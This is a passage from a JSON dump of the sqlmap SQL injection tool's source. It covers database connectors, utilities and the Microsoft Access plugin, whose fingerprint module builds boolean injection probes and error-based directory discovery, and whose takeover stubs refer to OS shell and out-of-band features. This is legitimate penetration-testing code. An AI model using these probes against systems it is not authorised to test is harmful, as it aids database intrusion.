rawdata[start_pos:match.end(1) + 1]\n            return k\n        # XXX The following should skip matching quotes (' or \")\n        # As a shortcut way to exit, this isn't so bad, but shouldn't\n        # be used to locate the actual end of the start tag since the\n        # < or > characters may be embedded in an attribute value.\n        match = endbracket.search(rawdata, i + 1)\n        if not match:\n            return -1\n        j = match.start(0)\n        # Now parse the data between i + 1 and j into a tag and attrs\n        attrs = []\n        if rawdata[i:i + 2] == '<>':\n            # SGML shorthand: <> == <last open tag seen>\n            k = j\n            tag = self.lasttag\n        else:\n            match = tagfind.match(rawdata, i + 1)\n            if not match:\n                self.error('unexpected call to parse_starttag')\n            k = match.end(0)\n            tag = rawdata[i + 1:k].lower()\n            self.lasttag = tag\n        while k < j:\n            match = attrfind.match(rawdata, k)\n            if not match:\n                break\n            attrname, rest, attrvalue = match.group(1, 2, 3)\n            if not rest:\n                attrvalue = attrname\n            else:\n                if (attrvalue[:1] == \"'\" == attrvalue[-1:] or\n                   attrvalue[:1] == '\"' == attrvalue[-1:]):\n                    # strip quotes\n                    attrvalue = attrvalue[1:-1]\n                attrvalue = self.entity_or_charref.sub(\n                    self._convert_ref, attrvalue)\n            attrs.append((attrname.lower(), attrvalue))\n            k = match.end(0)\n        if rawdata[j] == '>':\n            j = j + 1\n        self.__starttag_text = rawdata[start_pos:j]\n        self.finish_starttag(tag, attrs)\n        return j\n\n    # Internal -- convert entity or character reference\n    def _convert_ref(self, match):\n        if match.group(2):\n            return self.convert_charref(match.group(2)) or \\\n                '&#%s%s' % match.groups()[1:]\n        elif match.group(3):\n            return self.convert_entityref(match.group(1)) or \\\n                '&%s;' % match.group(1)\n        else:\n            return '&%s' % match.group(1)\n\n    # Internal -- parse endtag\n    def parse_endtag(self, i):\n        rawdata = self.rawdata\n        match = endbracket.search(rawdata, i + 1)\n        if not match:\n            return -1\n        j = match.start(0)\n        tag = rawdata[i + 2:j].strip().lower()\n        if rawdata[j] == '>':\n            j = j + 1\n        self.finish_endtag(tag)\n        return j\n\n    # Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>)\n    def finish_shorttag(self, tag, data):\n        self.finish_starttag(tag, [])\n        self.handle_data(data)\n        self.finish_endtag(tag)\n\n    # Internal -- finish processing of start tag\n    # Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag\n    def finish_starttag(self, tag, attrs):\n        try:\n            method = getattr(self, 'start_' + tag)\n        except AttributeError:\n            try:\n                method = getattr(self, 'do_' + tag)\n            except AttributeError:\n                self.unknown_starttag(tag, attrs)\n                return -1\n            else:\n                self.handle_starttag(tag, method, attrs)\n                return 0\n        else:\n            self.stack.append(tag)\n            self.handle_starttag(tag, method, attrs)\n            return 1\n\n    # Internal -- finish processing of end tag\n    def finish_endtag(self, tag):\n        if not tag:\n            found = len(self.stack) - 1\n            if found < 0:\n                self.unknown_endtag(tag)\n                return\n        else:\n            if tag not in self.stack:\n                try:\n                    method = getattr(self, 'end_' + tag)\n                except AttributeError:\n                    self.unknown_endtag(tag)\n                else:\n                    self.report_unbalanced(tag)\n                return\n            found = len(self.stack)\n            for i in range(found):\n                if self.stack[i] == tag:\n                    found = i\n        while len(self.stack) > found:\n            tag = self.stack[-1]\n            try:\n                method = getattr(self, 'end_' + tag)\n            except AttributeError:\n                method = None\n            if method:\n                self.handle_endtag(tag, method)\n            else:\n                self.unknown_endtag(tag)\n            del self.stack[-1]\n\n    # Overridable -- handle start tag\n    def handle_starttag(self, tag, method, attrs):\n        method(attrs)\n\n    # Overridable -- handle end tag\n    def handle_endtag(self, tag, method):\n        method()\n\n    # Example -- report an unbalanced </...> tag.\n    def report_unbalanced(self, tag):\n        if self.verbose:\n            print('*** Unbalanced </' + tag + '>')\n            print('*** Stack:', self.stack)\n\n    def convert_charref(self, name):\n        \"\"\"Convert character reference, may be overridden.\"\"\"\n        try:\n            n = int(name)\n        except ValueError:\n            return\n        if not 0 <= n <= 127:\n            return\n        return self.convert_codepoint(n)\n\n    def convert_codepoint(self, codepoint):\n        return chr(codepoint)\n\n    def handle_charref(self, name):\n        \"\"\"Handle character reference, no need to override.\"\"\"\n        replacement = self.convert_charref(name)\n        if replacement is None:\n            self.unknown_charref(name)\n        else:\n            self.handle_data(replacement)\n\n    # Definition of entities -- derived classes may override\n    entitydefs = \\\n        {'lt': '<', 'gt': '>', 'amp': '&', 'quot': '\"', 'apos': '\\''}\n\n    def convert_entityref(self, name):\n        \"\"\"Convert entity references.\n\n        As an alternative to overriding this method; one can tailor the\n        results by setting up the self.entitydefs mapping appropriately.\n        \"\"\"\n        table = self.entitydefs\n        if name in table:\n            return table[name]\n        else:\n            return\n\n    def handle_entityref(self, name):\n        \"\"\"Handle entity references, no need to override.\"\"\"\n        replacement = self.convert_entityref(name)\n        if replacement is None:\n            self.unknown_entityref(name)\n        else:\n            self.handle_data(replacement)\n\n    # Example -- handle data, should be overridden\n    def handle_data(self, data):\n        pass\n\n    # Example -- handle comment, could be overridden\n    def handle_comment(self, data):\n        pass\n\n    # Example -- handle declaration, could be overridden\n    def handle_decl(self, decl):\n        pass\n\n    # Example -- handle processing instruction, could be overridden\n    def handle_pi(self, data):\n        pass\n\n    # To be overridden -- handlers for unknown objects\n    def unknown_starttag(self, tag, attrs):\n        pass\n\n    def unknown_endtag(self, tag):\n        pass\n\n    def unknown_charref(self, ref):\n        pass\n\n    def unknown_entityref(self, ref):\n        pass\n\n\nclass TestSGMLParser(SGMLParser):\n\n    def __init__(self, verbose=0):\n        self.testdata = \"\"\n        SGMLParser.__init__(self, verbose)\n\n    def handle_data(self, data):\n        self.testdata = self.testdata + data\n        if len(repr(self.testdata)) >= 70:\n            self.flush()\n\n    def flush(self):\n        data = self.testdata\n        if data:\n            self.testdata = \"\"\n            print('data:', repr(data))\n\n    def handle_comment(self, data):\n        self.flush()\n        r = repr(data)\n        if len(r) > 68:\n            r = r[:32] + '...' + r[-32:]\n        print('comment:', r)\n\n    def unknown_starttag(self, tag, attrs):\n        self.flush()\n        if not attrs:\n            print('start tag: <' + tag + '>')\n        else:\n            print('start tag: <' + tag, end=' ')\n            for name, value in attrs:\n                print(name + '=' + '\"' + value + '\"', end=' ')\n            print('>')\n\n    def unknown_endtag(self, tag):\n        self.flush()\n        print('end tag: </' + tag + '>')\n\n    def unknown_entityref(self, ref):\n        self.flush()\n        print('*** unknown entity ref: &' + ref + ';')\n\n    def unknown_charref(self, ref):\n        self.flush()\n        print('*** unknown char ref: &#' + ref + ';')\n\n    def unknown_decl(self, data):\n        self.flush()\n        print('*** unknown decl: [' + data + ']')\n\n    def close(self):\n        SGMLParser.close(self)\n        self.flush()\n\n\ndef test(args=None):\n    import sys\n\n    if args is None:\n        args = sys.argv[1:]\n\n    if args and args[0] == '-s':\n        args = args[1:]\n        klass = SGMLParser\n    else:\n        klass = TestSGMLParser\n\n    if args:\n        file = args[0]\n    else:\n        file = 'test.html'\n\n    if file == '-':\n        f = sys.stdin\n    else:\n        try:\n            f = open(file, 'r')\n        except IOError as msg:\n            print(file, \":\", msg)\n            sys.exit(1)\n\n    data = f.read()\n    if f is not sys.stdin:\n        f.close()\n\n    x = klass()\n    for c in data:\n        x.feed(c)\n    x.close()\n\n\nif __name__ == '__main__':\n    test()\n"
  },
  {
    "path": "sqlmap/lib/utils/sqlalchemy.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport importlib\nimport logging\nimport os\nimport re\nimport sys\nimport traceback\nimport warnings\n\n_path = list(sys.path)\n_sqlalchemy = None\ntry:\n    sys.path = sys.path[1:]\n    module = importlib.import_module(\"sqlalchemy\")\n    if hasattr(module, \"dialects\"):\n        _sqlalchemy = module\n        warnings.simplefilter(action=\"ignore\", category=_sqlalchemy.exc.SAWarning)\nexcept ImportError:\n    pass\nfinally:\n    sys.path = _path\n\ntry:\n    import MySQLdb  # used by SQLAlchemy in case of MySQL\n    warnings.filterwarnings(\"error\", category=MySQLdb.Warning)\nexcept (ImportError, AttributeError):\n    pass\n\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapFilePathException\nfrom lib.core.exception import SqlmapMissingDependence\nfrom plugins.generic.connector import Connector as GenericConnector\nfrom thirdparty import six\n\ndef getSafeExString(ex, encoding=None):  # Cross-referenced function\n    raise NotImplementedError\n\nclass SQLAlchemy(GenericConnector):\n    def __init__(self, dialect=None):\n        GenericConnector.__init__(self)\n\n        self.dialect = dialect\n        self.address = conf.direct\n\n        if self.dialect:\n            self.address = re.sub(r\"\\A.+://\", \"%s://\" % self.dialect, self.address)\n\n    def connect(self):\n        if _sqlalchemy:\n            self.initConnection()\n\n            try:\n                if not self.port and self.db:\n                    if not os.path.exists(self.db):\n                        raise SqlmapFilePathException(\"the provided database file '%s' does not exist\" % self.db)\n\n                    _ = self.address.split(\"//\", 1)\n                    self.address = \"%s////%s\" % (_[0], os.path.abspath(self.db))\n\n                if self.dialect == \"sqlite\":\n                    engine = _sqlalchemy.create_engine(self.address, connect_args={\"check_same_thread\": False})\n                elif self.dialect == \"oracle\":\n                    engine = _sqlalchemy.create_engine(self.address)\n                else:\n                    engine = _sqlalchemy.create_engine(self.address, connect_args={})\n\n                self.connector = engine.connect()\n            except (TypeError, ValueError):\n                if \"_get_server_version_info\" in traceback.format_exc():\n                    try:\n                        import pymssql\n                        if int(pymssql.__version__[0]) < 2:\n                            raise SqlmapConnectionException(\"SQLAlchemy connection issue (obsolete version of pymssql ('%s') is causing problems)\" % pymssql.__version__)\n                    except ImportError:\n                        pass\n                elif \"invalid literal for int() with base 10: '0b\" in traceback.format_exc():\n                    raise SqlmapConnectionException(\"SQLAlchemy connection issue ('https://bitbucket.org/zzzeek/sqlalchemy/issues/3975')\")\n                else:\n                    pass\n            except SqlmapFilePathException:\n                raise\n            except Exception as ex:\n                raise SqlmapConnectionException(\"SQLAlchemy connection issue ('%s')\" % getSafeExString(ex))\n\n            self.printConnected()\n        else:\n            raise SqlmapMissingDependence(\"SQLAlchemy not available (e.g. 'pip%s install SQLAlchemy')\" % ('3' if six.PY3 else \"\"))\n\n    def fetchall(self):\n        try:\n            retVal = []\n            for row in self.cursor.fetchall():\n                retVal.append(tuple(row))\n            return retVal\n        except _sqlalchemy.exc.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor = self.connector.execute(query)\n            retVal = True\n        except (_sqlalchemy.exc.OperationalError, _sqlalchemy.exc.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except _sqlalchemy.exc.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        if self.execute(query):\n            retVal = self.fetchall()\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/lib/utils/timeout.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport threading\n\nfrom lib.core.data import logger\nfrom lib.core.enums import CUSTOM_LOGGING\nfrom lib.core.enums import TIMEOUT_STATE\n\ndef timeout(func, args=None, kwargs=None, duration=1, default=None):\n    class InterruptableThread(threading.Thread):\n        def __init__(self):\n            threading.Thread.__init__(self)\n            self.result = None\n            self.timeout_state = None\n\n        def run(self):\n            try:\n                self.result = func(*(args or ()), **(kwargs or {}))\n                self.timeout_state = TIMEOUT_STATE.NORMAL\n            except Exception as ex:\n                logger.log(CUSTOM_LOGGING.TRAFFIC_IN, ex)\n                self.result = default\n                self.timeout_state = TIMEOUT_STATE.EXCEPTION\n\n    thread = InterruptableThread()\n    thread.start()\n    thread.join(duration)\n\n    if thread.is_alive():\n        return default, TIMEOUT_STATE.TIMEOUT\n    else:\n        return thread.result, thread.timeout_state\n"
  },
  {
    "path": "sqlmap/lib/utils/versioncheck.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport sys\nimport time\n\nPYVERSION = sys.version.split()[0]\n\nif PYVERSION < \"2.6\":\n    sys.exit(\"[%s] [CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6, 2.7 or 3.x (visit 'https://www.python.org/downloads/')\" % (time.strftime(\"%X\"), PYVERSION))\n\nerrors = []\nextensions = (\"bz2\", \"gzip\", \"pyexpat\", \"ssl\", \"sqlite3\", \"zlib\")\nfor _ in extensions:\n    try:\n        __import__(_)\n    except ImportError:\n        errors.append(_)\n\nif errors:\n    errMsg = \"[%s] [CRITICAL] missing one or more core extensions (%s) \" % (time.strftime(\"%X\"), \", \".join(\"'%s'\" % _ for _ in errors))\n    errMsg += \"most likely because current version of Python has been \"\n    errMsg += \"built without appropriate dev packages\"\n    sys.exit(errMsg)\n"
  },
  {
    "path": "sqlmap/lib/utils/xrange.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport numbers\n\nclass xrange(object):\n    \"\"\"\n    Advanced (re)implementation of xrange (supports slice/copy/etc.)\n    Reference: http://code.activestate.com/recipes/521885-a-pythonic-implementation-of-xrange/\n\n    >>> list(xrange(1, 9)) == list(range(1, 9))\n    True\n    >>> list(xrange(8, 0, -16)) == list(range(8, 0, -16))\n    True\n    >>> list(xrange(0, 8, 16)) == list(range(0, 8, 16))\n    True\n    >>> list(xrange(0, 4, 5)) == list(range(0, 4, 5))\n    True\n    >>> list(xrange(4, 0, 3)) == list(range(4, 0, 3))\n    True\n    >>> list(xrange(0, -3)) == list(range(0, -3))\n    True\n    >>> list(xrange(0, 7, 2)) == list(range(0, 7, 2))\n    True\n    >>> foobar = xrange(1, 10)\n    >>> 7 in foobar\n    True\n    >>> 11 in foobar\n    False\n    >>> foobar[0]\n    1\n    \"\"\"\n\n    __slots__ = ['_slice']\n\n    def __init__(self, *args):\n        if args and isinstance(args[0], type(self)):\n            self._slice = slice(args[0].start, args[0].stop, args[0].step)\n        else:\n            self._slice = slice(*args)\n        if self._slice.stop is None:\n            raise TypeError(\"xrange stop must not be None\")\n\n    @property\n    def start(self):\n        if self._slice.start is not None:\n            return self._slice.start\n        return 0\n\n    @property\n    def stop(self):\n        return self._slice.stop\n\n    @property\n    def step(self):\n        if self._slice.step is not None:\n            return self._slice.step\n        return 1\n\n    def __hash__(self):\n        return hash(self._slice)\n\n    def __repr__(self):\n        return '%s(%r, %r, %r)' % (type(self).__name__, self.start, self.stop, self.step)\n\n    def __len__(self):\n        return self._len()\n\n    def _len(self):\n        return max(0, 1 + int((self.stop - 1 - self.start) // self.step))\n\n    def __contains__(self, value):\n        return (self.start <= value < self.stop) and (value - self.start) % self.step == 0\n\n    def __getitem__(self, index):\n        if isinstance(index, slice):\n            start, stop, step = index.indices(self._len())\n            return xrange(self._index(start),\n                          self._index(stop), step * self.step)\n        elif isinstance(index, numbers.Integral):\n            if index < 0:\n                fixed_index = index + self._len()\n            else:\n                fixed_index = index\n\n            if not 0 <= fixed_index < self._len():\n                raise IndexError(\"Index %d out of %r\" % (index, self))\n\n            return self._index(fixed_index)\n        else:\n            raise TypeError(\"xrange indices must be slices or integers\")\n\n    def _index(self, i):\n        return self.start + self.step * i\n\n    def index(self, i):\n        if self.start <= i < self.stop:\n            return i - self.start\n        else:\n            raise ValueError(\"%d is not in list\" % i)\n"
  },
  {
    "path": "sqlmap/plugins/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/access/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import ACCESS_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.access.enumeration import Enumeration\nfrom plugins.dbms.access.filesystem import Filesystem\nfrom plugins.dbms.access.fingerprint import Fingerprint\nfrom plugins.dbms.access.syntax import Syntax\nfrom plugins.dbms.access.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass AccessMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Microsoft Access methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = ACCESS_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.ACCESS] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/access/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import pyodbc\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.core.settings import IS_WIN\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/mkleehammer/pyodbc\n    User guide: https://github.com/mkleehammer/pyodbc/wiki\n    Debian package: python-pyodbc\n    License: MIT\n    \"\"\"\n\n    def connect(self):\n        if not IS_WIN:\n            errMsg = \"currently, direct connection to Microsoft Access database(s) \"\n            errMsg += \"is restricted to Windows platforms\"\n            raise SqlmapUnsupportedFeatureException(errMsg)\n\n        self.initConnection()\n        self.checkFileDb()\n\n        try:\n            self.connector = pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db)\n        except (pyodbc.Error, pyodbc.OperationalError) as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except pyodbc.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except (pyodbc.OperationalError, pyodbc.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except pyodbc.Error as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/access/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getBanner(self):\n        warnMsg = \"on Microsoft Access it is not possible to get the banner\"\n        logger.warning(warnMsg)\n\n        return None\n\n    def getCurrentUser(self):\n        warnMsg = \"on Microsoft Access it is not possible to enumerate the current user\"\n        logger.warning(warnMsg)\n\n    def getCurrentDb(self):\n        warnMsg = \"on Microsoft Access it is not possible to get name of the current database\"\n        logger.warning(warnMsg)\n\n    def isDba(self, user=None):\n        warnMsg = \"on Microsoft Access it is not possible to test if current user is DBA\"\n        logger.warning(warnMsg)\n\n    def getUsers(self):\n        warnMsg = \"on Microsoft Access it is not possible to enumerate the users\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPasswordHashes(self):\n        warnMsg = \"on Microsoft Access it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Microsoft Access it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getDbs(self):\n        warnMsg = \"on Microsoft Access it is not possible to enumerate databases (use only '--tables')\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchDb(self):\n        warnMsg = \"on Microsoft Access it is not possible to search databases\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchTable(self):\n        warnMsg = \"on Microsoft Access it is not possible to search tables\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchColumn(self):\n        warnMsg = \"on Microsoft Access it is not possible to search columns\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def search(self):\n        warnMsg = \"on Microsoft Access search option is not available\"\n        logger.warning(warnMsg)\n\n    def getHostname(self):\n        warnMsg = \"on Microsoft Access it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on Microsoft Access it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/access/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on Microsoft Access it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on Microsoft Access it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/access/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import getCurrentThreadData\nfrom lib.core.common import randomStr\nfrom lib.core.common import wasLastResponseDBMSError\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import ACCESS_ALIASES\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.ACCESS)\n\n    def _sandBoxCheck(self):\n        # Reference: http://milw0rm.com/papers/198\n        retVal = None\n        table = None\n\n        if Backend.isVersionWithin((\"97\", \"2000\")):\n            table = \"MSysAccessObjects\"\n        elif Backend.isVersionWithin((\"2002-2003\", \"2007\")):\n            table = \"MSysAccessStorage\"\n\n        if table is not None:\n            result = inject.checkBooleanExpression(\"EXISTS(SELECT CURDIR() FROM %s)\" % table)\n            retVal = \"not sandboxed\" if result else \"sandboxed\"\n\n        return retVal\n\n    def _sysTablesCheck(self):\n        infoMsg = \"executing system table(s) existence fingerprint\"\n        logger.info(infoMsg)\n\n        # Microsoft Access table reference updated on 01/2010\n        sysTables = {\n            \"97\": (\"MSysModules2\", \"MSysAccessObjects\"),\n            \"2000\": (\"!MSysModules2\", \"MSysAccessObjects\"),\n            \"2002-2003\": (\"MSysAccessStorage\", \"!MSysNavPaneObjectIDs\"),\n            \"2007\": (\"MSysAccessStorage\", \"MSysNavPaneObjectIDs\"),\n        }\n\n        # MSysAccessXML is not a reliable system table because it doesn't always exist\n        # (\"Access through Access\", p6, should be \"normally doesn't exist\" instead of \"is normally empty\")\n\n        for version, tables in sysTables.items():\n            exist = True\n\n            for table in tables:\n                negate = False\n\n                if table[0] == '!':\n                    negate = True\n                    table = table[1:]\n\n                result = inject.checkBooleanExpression(\"EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])\" % table)\n                if result is None:\n                    result = False\n\n                if negate:\n                    result = not result\n\n                exist &= result\n\n                if not exist:\n                    break\n\n            if exist:\n                return version\n\n        return None\n\n    def _getDatabaseDir(self):\n        retVal = None\n\n        infoMsg = \"searching for database directory\"\n        logger.info(infoMsg)\n\n        randStr = randomStr()\n        inject.checkBooleanExpression(\"EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])\" % (randStr, randStr))\n\n        if wasLastResponseDBMSError():\n            threadData = getCurrentThreadData()\n            match = re.search(r\"Could not find file\\s+'([^']+?)'\", threadData.lastErrorPage[1])\n\n            if match:\n                retVal = match.group(1).rstrip(\"%s.mdb\" % randStr)\n\n                if retVal.endswith('\\\\'):\n                    retVal = retVal[:-1]\n\n        return retVal\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.ACCESS\n            return value\n\n        actVer = Format.getDbms() + \" (%s)\" % (self._sandBoxCheck())\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                if re.search(r\"-log$\", kb.data.banner or \"\"):\n                    banVer += \", logging enabled\"\n\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        value += \"\\ndatabase directory: '%s'\" % self._getDatabaseDir()\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES):\n            setDbms(DBMS.ACCESS)\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.ACCESS\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"VAL(CVAR(1))=1\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.ACCESS\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.ACCESS\n                logger.warning(warnMsg)\n                return False\n\n            setDbms(DBMS.ACCESS)\n\n            if not conf.extensiveFp:\n                return True\n\n            infoMsg = \"actively fingerprinting %s\" % DBMS.ACCESS\n            logger.info(infoMsg)\n\n            version = self._sysTablesCheck()\n\n            if version is not None:\n                Backend.setVersion(version)\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.ACCESS\n            logger.warning(warnMsg)\n\n            return False\n\n    def forceDbmsEnum(self):\n        conf.db = (\"%s%s\" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_')\n"
  },
  {
    "path": "sqlmap/plugins/dbms/access/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHR(97)&CHR(98)&CHR(99)&CHR(100)&CHR(101)&CHR(102)&CHR(103)&CHR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"&\".join(\"CHR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/access/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Microsoft Access it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Microsoft Access it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Microsoft Access it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Microsoft Access it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
